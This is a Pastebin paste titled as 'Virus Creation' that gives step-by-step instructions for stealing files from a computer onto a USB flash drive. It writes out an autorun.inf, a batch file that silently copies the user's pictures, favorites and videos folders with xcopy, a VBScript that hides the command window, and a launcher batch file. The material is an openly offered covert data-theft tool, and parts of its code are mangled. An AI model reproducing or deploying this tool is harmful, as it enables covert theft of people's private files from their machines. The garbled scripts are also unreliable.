how to copy all files to a pendrive
qhosty Mar 23rd, 2019 72 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
- Virus Creation :
- How to copy (steal) files from a computer to a pendrive
- STEP 1
- Open Notepad (I recommend Notepad++)
- and copy-paste the following lines.
- [autorun] icon=drive.ico open=launch.bat action=Click OK to Run shell\open\command=launch.bat Save this as autorun.inf @echo off :: variables /min SET odrive=%odrive:~0,2% set backupcmd=xcopy /s /c /d /e /h /i /r /y echo off %backupcmd% “%USERPROFILE%\pictures” “%drive%\all\My pics” %backupcmd% “%USERPROFILE%\Favorites” “%drive%\all\Favorites” %backupcmd% “%USERPROFILE%\videos” “%drive%\all\vids” @echo off cls
- Save this as file.bat
- This file is configured to copy the contents of the current users pictures, favorites, and videos folder to the Flash drive under a folder called “all”. This is the section of the code you will need to edit depending on what you want to copy. The first file path
- “%USERPROFILE%\pictures” – is the target. The second file path “%drive%\all\My pics” – is the destination.
- STEP 3 Open Notepad once again and copy-paste the following line.
- CreateObject(“Wscript.Shell”).Run “””” & WScript.Arguments(0) & “”””, 0,
- Save this as invisible.vbs This code runs the file.bat as a process so it does not show the CMD prompt and everything the batch file is processing.
- STEP 4 Open Notepad one last time and copy-paste the following line.
- wscript.exe \invisible.vbs file.bat
- Save this as launch.bat
- This batch file does two things, it looks for the invisible.vbs file in the root of the Flash drive then loads it with file.bat so file.bat is run with code from vbs file.
- STEP 5 Copy all 4 files created in the above steps and put it on the root of the Flash drive, including the icon file if needed. Also create a folder named “all” where the contents are to be copied automatically. You can call this folder by any name, but then you need to reflect the changes you made in step 2. This is all that needs to be done.
RAW Paste Data